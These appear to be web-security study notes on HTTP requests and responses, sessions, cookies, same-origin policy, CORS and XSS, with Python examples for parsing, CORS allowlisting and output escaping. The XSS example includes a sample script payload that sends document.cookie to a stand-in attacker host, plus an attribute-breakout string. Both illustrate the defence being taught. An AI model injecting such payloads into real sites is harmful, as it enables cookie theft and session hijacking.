This log covers HTTP requests, responses, stateful web applications and web security.
A URL is like the address or phone number you need in order to visit or call a friend: it tells the client where a resource lives and how to reach it.
A URL (Uniform Resource Locator) is the most frequently used kind of Uniform Resource Identifier (URI).
A URL (http://www.example.com:88/home?item=book) can be broken into 5 parts:
- Scheme (http), the protocol the client should speak to the server
- Host (www.example.com), the server that holds the resource
- Port (88 here; the HTTP default port is 80 and the HTTPS default is 443, so the port is usually omitted)
- URL Path (/home), which resource on that host is being requested
- Query String Parameters (item=book), name=value pairs after the ?, separated by &
A full list of HTTP request method definitions can be found at w3.org.
GET, used to retrieve a resource. GET carries all of its parameters in the URL, so there are size limits, and anything in the URL ends up in browser history, proxy and server logs and Referer headers, which is why secrets must never be sent in a GET query string. The response to a GET can be anything (HTML, JSON, an image, ...).
POST, used to send data to a server or to initiate an action on the server. It can carry larger payloads (image/video uploads) and sensitive data (username/password). The data sent via a POST request is contained in the HTTP body, the part of an HTTP message after the headers that holds the data being transmitted. Note that a POST body is only protected from eavesdropping when the request travels over HTTPS; POST by itself provides no encryption.
HTTP headers carry additional information during the request/response cycle. Headers are colon-separated name-value pairs in plain text, one per line (for example Host: www.example.com), and a blank line separates the headers from the body. Common request header fields are
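Added example (Python), not from the original notes: it splits the notes' sample URL into the five parts listed above and renders the raw HTTP/1.1 message a client would send, to make the difference between a GET (parameters in the request target) and a POST (parameters in the body, announced by Content-Type and Content-Length) visible on the wire. The login form data in the POST is constructed for the example.

```python
from urllib.parse import urlsplit, parse_qs

DEFAULT_PORTS = {"http": 80, "https": 443}


def url_parts(url):
    """Split a URL into the five components described in the notes.

    The port falls back to the scheme's default when the URL omits it.
    """
    s = urlsplit(url)
    if s.scheme not in DEFAULT_PORTS:
        raise ValueError(f"unsupported scheme: {s.scheme!r}")
    return {
        "scheme": s.scheme,
        "host": s.hostname,
        "port": s.port if s.port is not None else DEFAULT_PORTS[s.scheme],
        "path": s.path or "/",
        "query_string": s.query,
        # parse_qs keeps repeated names: ?item=book&item=pen -> {'item': ['book', 'pen']}
        "query": parse_qs(s.query),
    }


def build_request(method, url, body=b"", extra_headers=None):
    """Render the raw HTTP/1.1 message a client would put on the wire.

    GET carries its parameters in the request target (path + query string);
    POST carries them in the body, described by Content-Type/Content-Length.
    """
    p = url_parts(url)
    target = p["path"] + (f"?{p['query_string']}" if p["query_string"] else "")
    host = p["host"]
    if p["port"] != DEFAULT_PORTS[p["scheme"]]:
        host = f"{host}:{p['port']}"          # Host keeps a non-default port
    headers = {"Host": host, "Connection": "close"}
    if body:
        headers["Content-Type"] = "application/x-www-form-urlencoded"
        headers["Content-Length"] = str(len(body))
    headers.update(extra_headers or {})
    head = f"{method} {target} HTTP/1.1\r\n"
    head += "".join(f"{name}: {value}\r\n" for name, value in headers.items())
    head += "\r\n"                             # blank line ends the header block
    return head.encode("ascii") + body


if __name__ == "__main__":
    print(url_parts("http://www.example.com:88/home?item=book"))
    print(build_request("GET", "http://www.example.com:88/home?item=book").decode())
    # Constructed login data: credentials belong in a POST body over HTTPS, never in a URL.
    print(build_request("POST", "https://www.example.com/login",
                        body=b"username=alice&password=s3cret").decode())
```

Run it and compare the two printed messages: the GET has its data after the ? on the first line, the POST has it after the blank line, and the Host header only carries a port when it is not the scheme's default.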
A response is the data the server returns for a request: a status line, response headers, and usually a body.
An HTTP status code is a three-digit number the server sends back in the status line of its response, telling the client how the request was handled (2xx success, 3xx redirect, 4xx client error, 5xx server error).
A full list of HTTP status codes can be found at w3.org.
Common HTTP status codes are
- 404 (Not Found), the requested resource does not exist on the server
- 500 (Internal Server Error), the server hit an error while handling the request
- 302 (Found/Redirect), the client is sent on from the original URL to the new URL given in the response's Location header
Like request headers, response headers provide additional information about the resource being sent (content type, length, caching, cookies to set, and so on).
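Added example (Python), not from the original notes: a small parser for a raw HTTP/1.1 response that pulls out the status code, the colon-separated headers and the body, then resolves the Location of a 302 against the URL that was requested. The two responses are constructed for the example, not captured from a real server; the checks on Content-Length and on repeated headers (Set-Cookie may legitimately appear more than once) are the kind of thing a careful client does that the notes do not spell out.

```python
import re
from urllib.parse import urljoin

# Constructed sample responses for this example; not captured from a real server.
RAW_302 = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: /login\r\n"
    b"Set-Cookie: session=abc123; Path=/\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)
RAW_200 = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"Content-Length: 13\r\n"
    b"\r\n"
    b"<h1>Home</h1>"
)

STATUS_LINE = re.compile(r"^HTTP/(\d\.\d) (\d{3})(?: (.*))?$")
REDIRECTS = {301, 302, 303, 307, 308}


def parse_response(raw):
    """Split a raw HTTP/1.1 response into status line, headers and body.

    Header names are case-insensitive, so they are lower-cased; repeated
    headers such as Set-Cookie are kept as a list instead of being overwritten.
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers")
    lines = head.decode("iso-8859-1").split("\r\n")
    m = STATUS_LINE.match(lines[0])
    if not m:
        raise ValueError(f"malformed status line: {lines[0]!r}")
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if not colon or not name.strip():
            raise ValueError(f"malformed header: {line!r}")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    # Don't trust the body blindly: it must match the declared Content-Length.
    if "content-length" in headers and int(headers["content-length"][0]) != len(body):
        raise ValueError("Content-Length does not match body")
    return {
        "version": m.group(1),
        "status": int(m.group(2)),
        "reason": m.group(3) or "",
        "headers": headers,
        "body": body,
    }


def redirect_target(request_url, response):
    """For a 3xx response, resolve Location against the URL that was requested.

    Location may be relative ("/login"), so it is joined with the original URL
    before the client follows it. Returns None for non-redirect responses.
    """
    if response["status"] in REDIRECTS and "location" in response["headers"]:
        return urljoin(request_url, response["headers"]["location"][0])
    return None


if __name__ == "__main__":
    r = parse_response(RAW_302)
    print(r["status"], r["reason"], "->", redirect_target("http://www.example.com:88/home", r))
    print(parse_response(RAW_200)["body"].decode())
```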
Stateful Web Application
After the client authenticates, the server sends it a session identifier (a unique, unguessable token). On every later request the client attaches that token, and the server uses it to recognise the client again. Passing the token back and forth gives the appearance of a persistent connection on top of HTTP, which is itself stateless: each request is independent of the ones before it.
To use sessions, the server has to do the following on every request:
- Inspect the request to see if it contains a session ID
- Verify the session ID by comparing it with the stored session data
- Retrieve the session data based on the session ID
- Recreate the application state from that data
A cookie is a small piece of data the server sends to the client (in a Set-Cookie response header); the client stores it and sends it back with every subsequent request to that site (in a Cookie request header).
On each request the cookie value sent by the client is compared with the server-side session data to identify the current session.
Only the session ID is stored on the client; it acts as a key to the session data, which stays on the server.
Without TLS, requests and responses travel across the network as plaintext strings. Anyone on the network path (a shared Wi-Fi network, a compromised router) can sniff the packets and read the messages, including the session cookie.
With HTTPS, every request and response is encrypted before it is transported: HTTP is carried over TLS (Transport Layer Security), a cryptographic protocol that provides confidentiality and integrity for the messages and authenticates the server to the client.
The same-origin policy prevents scripts loaded from one origin from reading or manipulating documents from another origin. It is an important guard against session hijacking, because a script on an attacker's site cannot read the application's cookies or page content. Two documents have the same origin when they share the same:
- Scheme (protocol, e.g. http vs https)
- Host
- Port number
Cross-origin resource sharing (CORS) is a mechanism that allows resources on one origin to be requested, and their responses read, from another origin. CORS works through additional HTTP headers: the browser sends an Origin request header, and the server replies with Access-Control-Allow-Origin (and related headers) naming which foreign origins are permitted; anything else stays blocked by the same-origin policy.
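Added example (Python), not from the original notes: the same-origin comparison as code (scheme, host, port, with the default port filled in) together with the server-side decision of which CORS headers to return. The allowlist of partner origins is an assumption for the example. The two CORS mistakes it refuses to make, reflecting any Origin back and combining "*" with credentials, are not discussed in the notes but are the usual way CORS ends up cancelling the protection the same-origin policy provides.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}

# Assumed allowlist of foreign origins permitted to read our responses (example only).
ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}


def origin(url):
    """The (scheme, host, port) triple that the same-origin policy compares.

    An omitted port means the scheme's default, so http://a.example and
    http://a.example:80 are the same origin.
    """
    s = urlsplit(url)
    if s.scheme not in DEFAULT_PORTS or s.hostname is None:
        raise ValueError(f"cannot determine origin of {url!r}")
    port = s.port if s.port is not None else DEFAULT_PORTS[s.scheme]
    return (s.scheme, s.hostname.lower(), port)


def same_origin(url_a, url_b):
    """True when a script from url_a may touch a document from url_b."""
    return origin(url_a) == origin(url_b)


def cors_response_headers(request_origin, with_credentials=True):
    """Choose the CORS headers a server adds for a cross-origin request.

    Only exact, allowlisted origins are echoed back. Reflecting whatever Origin
    the request carried, or answering "*" while also allowing credentials,
    would let any site read responses that carry the user's session cookie,
    undoing the protection the same-origin policy gives against hijacking.
    """
    if request_origin is None or request_origin not in ALLOWED_ORIGINS:
        return {}   # no Access-Control-Allow-Origin: the browser refuses the read
    headers = {
        "Access-Control-Allow-Origin": request_origin,
        "Vary": "Origin",   # caches must not serve one origin's answer to another
    }
    if with_credentials:
        headers["Access-Control-Allow-Credentials"] = "true"
    return headers


if __name__ == "__main__":
    print(same_origin("http://www.example.com/home", "http://www.example.com:80/other"))
    print(same_origin("http://www.example.com/home", "https://www.example.com/home"))
    print(cors_response_headers("https://app.example.com"))
    print(cors_response_headers("https://evil.example"))
```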
After a successful login the session ID is stored in the browser, normally as a cookie. Whoever holds that ID holds the session: if an attacker obtains it (for example by sniffing plaintext HTTP, or by stealing it with injected script), attacker and user share the same session and the attacker can use the web application as that user without ever knowing the password.
Countermeasures for session hijacking are:
- Resetting sessions by creating a new ID for every successful login, so an ID an attacker planted or captured before login is worthless afterwards
- Setting an expiration time on sessions, so a stolen ID is only useful for a limited window
- Using HTTPS across the entire app, so the ID is never transmitted in plaintext
Cross-Site Scripting (XSS)
XSS happens when attacker-supplied input is placed into a page the site serves without being neutralised, so the browser treats it as markup or script. Because the injected code is delivered by the site itself, it bypasses the same-origin policy: it runs with the site's origin and can read the document and its cookies (the session ID included, unless the cookie is marked HttpOnly) and send them to the attacker.
Countermeasures for XSS are:
- Always validate user input: reject problematic input, ideally by allowlisting what the field may legitimately contain
- Escape all user-supplied data when displaying it, using the escaping that matches where it lands (HTML body, attribute, URL, script), so the browser renders it as text rather than markup
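Added example (Python), not from the original notes: a vulnerable template next to its escaped version, so the effect of output escaping can be seen directly, plus an allowlist validator for a username field. The payload and the username rules are constructed for the example. The attribute-context renderer goes one step beyond the notes: body-text escaping alone is not enough when user data lands inside an HTML attribute, because a quote character in the value can break out of it.

```python
import html
import re

# Constructed attacker input: if rendered as markup it ships the victim's cookies
# to a host the attacker controls (attacker.test is a reserved example name).
PAYLOAD = "<script>new Image().src='http://attacker.test/?c='+document.cookie</script>"


def render_unsafe(display_name):
    """Vulnerable: user data is concatenated straight into the page.

    The page comes from the site, so the injected script runs with the site's
    origin and the same-origin policy does nothing to stop it.
    """
    return f"<p>Hello, {display_name}!</p>"


def render_escaped(display_name):
    """Hardened: escape for the HTML body context at output time.

    The browser now shows the payload as literal text instead of executing it.
    """
    return f"<p>Hello, {html.escape(display_name, quote=True)}!</p>"


def render_attribute(display_name):
    """Attribute context: the value must be quoted AND quote characters escaped,
    otherwise a value like  " onfocus="alert(1)  closes the attribute and adds
    an event handler of the attacker's choosing."""
    return f'<input name="display_name" value="{html.escape(display_name, quote=True)}">'


USERNAME = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def validate_username(value):
    """Input-side countermeasure: for a field whose legitimate shape is known,
    allowlist it and reject everything else rather than stripping 'bad' characters."""
    if not USERNAME.match(value):
        raise ValueError("username may only contain letters, digits, _ . - (1-32 chars)")
    return value


def has_script_tag(rendered):
    """Crude check used to show which renderings leave live markup behind."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_unsafe(PAYLOAD))      # script tag survives: XSS
    print(render_escaped(PAYLOAD))     # &lt;script&gt;...: harmless text
    print(render_attribute('" onfocus="alert(1)'))
```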